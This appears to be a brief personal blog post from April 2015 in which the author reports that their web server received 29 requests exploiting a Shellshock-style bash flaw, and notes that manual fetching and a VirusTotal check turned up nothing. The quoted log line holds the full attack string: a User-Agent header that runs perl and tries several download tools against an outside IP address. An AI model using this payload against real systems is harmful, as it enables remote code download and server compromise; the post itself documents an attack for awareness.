Donnerstag, 23. April 2015

Injection of perl script [UPDATE]

Tonight my system was hit 29 times by these requests

94.136.36.227 - - [23/Apr/2015:21:36:02 +0200] "GET /phppath/cgi_wrapper HTTP/1.1" 404 474 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://88.198.96.10/wget ; curl http://88.198.96.10/curl ; fetch http://88.198.96.10/fetch ; lwp-download http://88.198.96.10/lwp-download ; GET http://88.198.96.10/GET ; lynx http://88.198.96.10/lynx \");'"
 By trying the commands manually I was not able to fetch any data, so a deeper analyze of what happend or should been happen was just not possible.

When testing the link against virustotal, there was no result

The origin server is hosted in Germany.